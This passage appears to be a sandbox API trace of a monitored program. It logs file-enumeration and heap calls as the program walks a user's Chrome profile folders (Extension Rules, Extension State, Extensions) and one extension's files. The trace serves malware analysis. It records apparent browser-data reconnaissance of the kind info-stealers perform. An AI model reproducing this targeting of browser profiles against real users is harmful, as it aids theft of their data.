hHeap=0x3f0000) returned 1 [0137.583] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.583] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="Extension Rules", cAlternateFileName="EXTENS~3")) returned 1 [0137.583] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.584] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.584] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.584] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="..", cAlternateFileName="")) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="000003.log", cAlternateFileName="")) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82adc050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82adc050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x499b90 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82ad9940, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOCK", cAlternateFileName="")) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOG", cAlternateFileName="")) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0137.586] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0137.586] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.586] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0137.587] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0137.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.588] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="Extension State", cAlternateFileName="EXTENS~2")) returned 1 [0137.588] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.588] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.588] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.588] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="..", cAlternateFileName="")) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="000003.log", cAlternateFileName="")) returned 1 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824d3190, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x499b90 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOCK", cAlternateFileName="")) returned 1 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOG", cAlternateFileName="")) returned 1 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.591] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0137.591] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.591] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0137.592] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.592] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0137.592] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0137.593] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.593] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.593] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0137.593] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.593] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.593] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.593] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.593] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.596] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.596] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="..", cAlternateFileName="")) returned 1 [0137.596] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="aapocclcgogkmnckokdopfmhonfmgoek", cAlternateFileName="AAPOCC~1")) returned 1 [0137.596] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0137.596] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.596] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0137.596] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.596] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0137.596] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b6f6f43, dwReserved1=0x2f736569, cFileName=".", cAlternateFileName="")) returned 0x9148af8 [0137.598] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0137.598] FindNextFileA (in: hFindFile=0x9148af8, lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b6f6f43, dwReserved1=0x2f736569, cFileName="..", cAlternateFileName="")) returned 1 [0137.598] FindNextFileA (in: hFindFile=0x9148af8, lpFindFileData=0x36df20 | out: lpFindFileData=0x36df20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b6f6f43, dwReserved1=0x2f736569, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0137.598] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0137.598] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.598] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148b38 [0137.601] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.601] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.601] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.601] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138c90 [0137.601] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.601] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0137.601] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.601] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138d58 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9138c90 | out: hHeap=0x3f0000) returned 1 [0137.602] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138c90 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9138d58 | out: hHeap=0x3f0000) returned 1 [0137.602] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, 